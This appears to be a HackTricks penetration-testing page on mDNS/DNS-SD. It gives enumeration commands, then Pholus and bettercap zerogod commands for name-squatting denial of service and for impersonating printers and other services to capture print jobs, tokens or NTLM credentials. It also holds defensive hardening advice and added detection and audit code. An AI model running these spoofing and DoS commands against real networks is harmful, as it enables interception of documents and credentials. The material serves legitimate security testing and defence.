5353/UDP Multicast DNS (mDNS) and DNS-SD
tip
Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
Multicast DNS (mDNS) provides DNS-like name resolution and service discovery within the local link without a unicast DNS server. It uses UDP/5353 and the multicast addresses 224.0.0.251 (IPv4) and FF02::FB (IPv6). DNS Service Discovery (DNS-SD, usually used together with mDNS) defines a structured way to enumerate and describe services through PTR, SRV and TXT records.
PORT STATE SERVICE
5353/udp open zeroconf
Key protocol details you’ll often leverage during attacks:
- Names in the .local domain are resolved via mDNS.
- The QU (Query Unicast) bit can request a unicast reply even for a multicast query.
- Implementations should ignore packets that do not originate from the local link; some stacks still accept them.
- Probing/announcing enforces unique host/service names; interfering here can create DoS/"name squatting" conditions.
DNS-SD service model
Services are advertised as _
Network Exploration and Enumeration
- nmap target scan (direct mDNS on a host):
nmap -sU -p 5353 --script=dns-service-discovery <target>
- nmap broadcast discovery (listen to the segment and enumerate all DNS-SD types/instances):
sudo nmap --script=broadcast-dns-service-discovery
- avahi-browse (Linux):
# List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art
- Apple dns-sd (macOS):
# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance to SRV/TXT
dns-sd -L "My Printer" _ipp._tcp local
- Packet capture with tshark:
# Live capture
sudo tshark -i <iface> -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i <iface> -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""
Tip: Some browsers/WebRTC use short-lived mDNS names to hide local IPs. If you see random-UUID.local candidates on the wire, resolve them via mDNS to recover the internal IPs.
Attacks
mDNS name probing interference (DoS / name squatting)
During the probing phase, a host checks that its chosen name is unique. Answering with spoofed conflicts forces it to pick new names or to fail. This can delay or prevent service registration and discovery.
Example with Pholus:
# Block new devices from taking names by auto-faking responses
sudo python3 pholus3.py <iface> -afre -stimeout 1000
Service spoofing and impersonation (MitM)
Impersonate advertised DNS-SD services (printers, AirPlay, HTTP, file sharing) to lure clients into connecting to you. This is especially useful for:
- Capturing documents by spoofing _ipp._tcp or _printer._tcp.
- Luring clients to HTTP/HTTPS services to harvest tokens/cookies or deliver payloads.
- Chaining with NTLM relay techniques when Windows clients authenticate to the spoofed services.
With bettercap's zerogod module (mDNS/DNS-SD spoofer/impersonator):
# Start mDNS/DNS-SD discovery
sudo bettercap -iface <iface> -eval "zerogod.discovery on"
# Show all services seen from a host
> zerogod.show 192.168.1.42
# Impersonate all services of a target host automatically
> zerogod.impersonate 192.168.1.42
# Save IPP print jobs to disk while impersonating a printer
> set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
> zerogod.impersonate 192.168.1.42
# Replay previously captured services
> zerogod.save 192.168.1.42 target.yml
> zerogod.advertise target.yml
Also see LLMNR/NBNS/mDNS/WPAD spoofing and credential capture/relay workflows:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Notes on recent implementation issues (useful for DoS/persistence during engagements)
- Avahi reachable-assertion and D-Bus crash bugs (2023) can kill avahi-daemon on Linux distributions (e.g. CVE-2023-38469..38473, CVE-2023-1981), breaking service discovery on the target host until it is restarted.
- Cisco IOS XE Wireless LAN Controller mDNS gateway DoS (2024, CVE-2024-20303) lets adjacent attackers drive high CPU and drop APs. If you encounter an mDNS gateway between VLANs, be mindful of its stability under malformed or high-rate mDNS.
Defensive notes and OPSEC
- Segment boundaries: Do not allow 224.0.0.251/FF02::FB across security zones unless an mDNS gateway is explicitly required. If you must bridge discovery, prefer allow-lists and rate limits.
- Windows endpoints/servers:
- To completely disable name resolution via mDNS, set the registry value and reboot:
HKLM\SYSTEM\CurrentControlSet\Services\Dnscache\Parameters\EnableMDNS = 0 (DWORD)
- In managed environments, disable the Windows Defender Firewall rule "mDNS (UDP-In)" (at least on the Domain profile) to block inbound mDNS processing while preserving home/roaming functionality.
- On newer Windows 11/GPO templates, use the policy "Computer Configuration > Administrative Templates > Network > DNS Client > Configure multicast DNS (mDNS) protocol" and set it to Disabled.
- Linux (Avahi):
- Disable publishing when it is not needed: set disable-publishing=yes, and restrict interfaces with allow-interfaces= / deny-interfaces= in /etc/avahi/avahi-daemon.conf.
- Consider check-response-ttl=yes and avoid enable-reflector=yes unless strictly required; prefer reflect-filters= allow-lists when you do reflect.
- macOS: Restrict inbound mDNS on the host/network firewall where Bonjour discovery is not needed for a given subnet.
- Monitoring: Alert on unusual increases in _services._dns-sd._udp.local queries or sudden changes in the SRV/TXT records of critical services; these are indicators of spoofing or service impersonation.
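As an added example (my code, not from the page or from any of the tools it lists) that ties the protocol details above (QU bit, cache-flush bit, name compression) to the monitoring bullet: a small mDNS/DNS-SD decoder written against the wire format, plus a detector that remembers the last SRV/TXT seen per service instance and alerts when a known instance suddenly points at a different host/port, or when one source keeps querying _services._dns-sd._udp.local. All packets, hostnames, instance names and source addresses are constructed inline; the alert threshold and message wording are my own choices.

```python
import struct
from collections import Counter
SERVICE_LIST = "_services._dns-sd._udp.local"
TYPE_PTR, TYPE_TXT, TYPE_SRV = 12, 16, 33

def read_name(buf, off):
    """Decode a DNS name at off, following compression pointers (RFC 1035 4.1.4)."""
    labels, end = [], None                # end: offset just after the name in the stream
    for _ in range(128):                  # bounded walk guards against pointer loops
        length = buf[off]
        if length & 0xC0 == 0xC0:         # pointer: 14-bit offset into the packet
            end = off + 2 if end is None else end
            off = ((length & 0x3F) << 8) | buf[off + 1]
            continue
        off += 1
        if length == 0:
            break
        labels.append(buf[off:off + length].decode("utf-8", "replace"))
        off += length
    else:
        raise ValueError("compression pointer loop")
    return ".".join(labels), (off if end is None else end)

def parse_txt(rdata):
    items, i = [], 0                      # TXT rdata: length-prefixed key=value strings
    while i < len(rdata):
        items.append(rdata[i + 1:i + 1 + rdata[i]].decode("utf-8", "replace"))
        i += 1 + rdata[i]
    return items

def parse_mdns(buf):
    txid, flags, qd, an, ns, ar = struct.unpack_from("!6H", buf, 0)
    off, questions, records = 12, [], []
    for _ in range(qd):
        name, off = read_name(buf, off)
        qtype, qclass = struct.unpack_from("!HH", buf, off)
        off += 4
        # QU bit: top bit of QCLASS asks for a unicast reply to a multicast query
        questions.append({"name": name, "type": qtype, "qu": bool(qclass & 0x8000)})
    for _ in range(an + ns + ar):
        name, off = read_name(buf, off)
        rtype, rclass, ttl, rdlen = struct.unpack_from("!HHIH", buf, off)
        off += 10
        # cache-flush bit: top bit of CLASS tells peers to drop older cached records
        rec = {"name": name, "type": rtype, "ttl": ttl, "cache_flush": bool(rclass & 0x8000)}
        if rtype in (TYPE_PTR, TYPE_SRV):
            if rtype == TYPE_SRV:         # SRV: priority, weight, port, then the target name
                _prio, _weight, rec["port"] = struct.unpack_from("!HHH", buf, off)
            rec["target"], _ = read_name(buf, off + (6 if rtype == TYPE_SRV else 0))
        elif rtype == TYPE_TXT:
            rec["txt"] = parse_txt(buf[off:off + rdlen])
        off += rdlen
        records.append(rec)
    return {"id": txid, "response": bool(flags & 0x8000), "questions": questions, "records": records}

class DnsSdMonitor:
    """Tracks SRV/TXT per service instance and service-list query counts per source."""
    def __init__(self, query_threshold=20):
        self.state, self.list_queries, self.query_threshold = {}, Counter(), query_threshold
    def observe(self, src, packet):
        alerts = []
        for q in packet["questions"]:
            if q["name"] == SERVICE_LIST:
                self.list_queries[src] += 1
                if self.list_queries[src] == self.query_threshold:
                    alerts.append(f"{src}: {self.query_threshold} service-list queries (enumeration sweep?)")
        for r in packet["records"]:
            kind = {TYPE_SRV: "SRV", TYPE_TXT: "TXT"}.get(r["type"])
            if kind:
                value = (r["target"], r["port"]) if kind == "SRV" else tuple(r["txt"])
                known = self.state.setdefault(r["name"], {})
                if kind in known and known[kind] != value:   # known instance now points elsewhere
                    alerts.append(f"{src}: {kind} for {r['name']} changed {known[kind]} -> {value}")
                known[kind] = value
        return alerts

# Constructed test packets (uncompressed names; the parser accepts both forms).
def _name(s):
    return b"".join(bytes([len(l)]) + l.encode() for l in s.split(".")) + b"\x00"
def build_packet(questions=(), records=(), response=False):
    hdr = struct.pack("!6H", 0, 0x8400 if response else 0, len(questions), len(records), 0, 0)
    qs = b"".join(_name(n) + struct.pack("!HH", t, 1 | (0x8000 if qu else 0)) for n, t, qu in questions)
    rrs = b"".join(_name(n) + struct.pack("!HHIH", t, 1 | (0x8000 if fl else 0), 120, len(rd)) + rd
                   for n, t, rd, fl in records)
    return hdr + qs + rrs
def srv_rdata(target, port):
    return struct.pack("!HHH", 0, 0, port) + _name(target)
def txt_rdata(*items):
    return b"".join(bytes([len(i)]) + i.encode() for i in items)
def demo():
    mon, alerts, inst = DnsSdMonitor(query_threshold=3), [], "Lobby Printer._ipp._tcp.local"
    good = build_packet(records=[(inst, TYPE_SRV, srv_rdata("printer.local", 631), True),
                                 (inst, TYPE_TXT, txt_rdata("txtvers=1", "rp=ipp/print"), True)], response=True)
    alerts += mon.observe("192.0.2.10", parse_mdns(good))       # baseline: no alert
    rogue = build_packet(records=[(inst, TYPE_SRV, srv_rdata("other-host.local", 8631), True)], response=True)
    alerts += mon.observe("192.0.2.66", parse_mdns(rogue))      # same instance, new SRV target
    for _ in range(3):                                          # repeated service-list queries
        alerts += mon.observe("192.0.2.66", parse_mdns(build_packet(questions=[(SERVICE_LIST, TYPE_PTR, True)])))
    return alerts
```

demo() returns two alerts: the SRV change for the printer instance and the query burst from the second source. In a real deployment the same observe() call would be fed from a UDP/5353 socket joined to 224.0.0.251, and the SRV baseline would be seeded from a known-good inventory rather than from whatever answers first.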
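An added example for the Avahi bullets above (my code, not part of the page or of the Avahi project): it audits an avahi-daemon.conf against the settings named there and emits a hardened copy. The sample configuration is constructed; the section names ([server], [publish], [reflector]) follow avahi-daemon.conf(5), and the interface name eth0 is an assumption.

```python
import configparser
import io

# Constructed sample: a permissive /etc/avahi/avahi-daemon.conf as often shipped.
PERMISSIVE_CONF = """\
[server]
use-ipv4=yes
use-ipv6=yes

[publish]
publish-addresses=yes

[reflector]
enable-reflector=yes
"""

def _load(text):
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp

def _get(cp, section, key):
    return cp.get(section, key, fallback="").strip().lower()

def audit_avahi(text, publishing_needed=False, reflector_needed=False):
    """Return a list of findings; an empty list means the config matches the advice."""
    cp, findings = _load(text), []
    if not publishing_needed and _get(cp, "publish", "disable-publishing") != "yes":
        findings.append("publish: disable-publishing is not 'yes' (host advertises services)")
    if not _get(cp, "server", "allow-interfaces") and not _get(cp, "server", "deny-interfaces"):
        findings.append("server: no allow-interfaces/deny-interfaces (mDNS handled on every interface)")
    if _get(cp, "server", "check-response-ttl") != "yes":
        findings.append("server: check-response-ttl is not 'yes' (responses not from the local link may be accepted)")
    if _get(cp, "reflector", "enable-reflector") == "yes":
        if not reflector_needed:
            findings.append("reflector: enable-reflector=yes without a documented need")
        elif not _get(cp, "reflector", "reflect-filters"):
            findings.append("reflector: enabled without a reflect-filters allow-list")
    return findings

def harden_avahi(text, allow_interfaces="eth0"):
    """Apply the recommendations to a config and return the new file contents."""
    cp = _load(text)
    for section in ("server", "publish", "reflector"):
        if not cp.has_section(section):
            cp.add_section(section)
    cp["publish"]["disable-publishing"] = "yes"
    cp["server"]["allow-interfaces"] = allow_interfaces   # assumed interface name
    cp["server"]["check-response-ttl"] = "yes"
    cp["reflector"]["enable-reflector"] = "no"
    out = io.StringIO()
    cp.write(out, space_around_delimiters=False)          # avahi expects key=value
    return out.getvalue()

if __name__ == "__main__":
    for finding in audit_avahi(PERMISSIVE_CONF):
        print("FINDING:", finding)
    print(harden_avahi(PERMISSIVE_CONF))
```

Run it against the real file with `audit_avahi(open("/etc/avahi/avahi-daemon.conf").read())`; pass publishing_needed=True or reflector_needed=True for hosts that legitimately advertise or reflect, so the audit only flags the reflector when it lacks a reflect-filters allow-list.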
Quick tool reference
- nmap NSE: dns-service-discovery and broadcast-dns-service-discovery.
- Pholus: active scanner, reverse mDNS sweeps, DoS and spoofing helpers.
# Passive sniff (timeout seconds)
sudo python3 pholus3.py <iface> -stimeout 60
# Enumerate service types
sudo python3 pholus3.py <iface> -sscan
# Send generic mDNS requests
sudo python3 pholus3.py <iface> --request
# Reverse mDNS sweep of a subnet
sudo python3 pholus3.py <iface> -rdns_scanning 192.168.2.0/24
- bettercap zerogod: discover, save, advertise and impersonate mDNS/DNS-SD services (see the examples above).
Spoofing/MitM
The most interesting attack you can perform against this service is a MitM of the communication between the client and the real server. You may be able to obtain sensitive files (MitM the communication with a printer) or even credentials (Windows authentication).
For more information check:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
References
- Practical IoT Hacking: The Definitive Guide to Attacking the Internet of Things
- Nmap NSE: broadcast-dns-service-discovery
- bettercap zerogod (mDNS/DNS-SD discovery, spoofing, impersonation)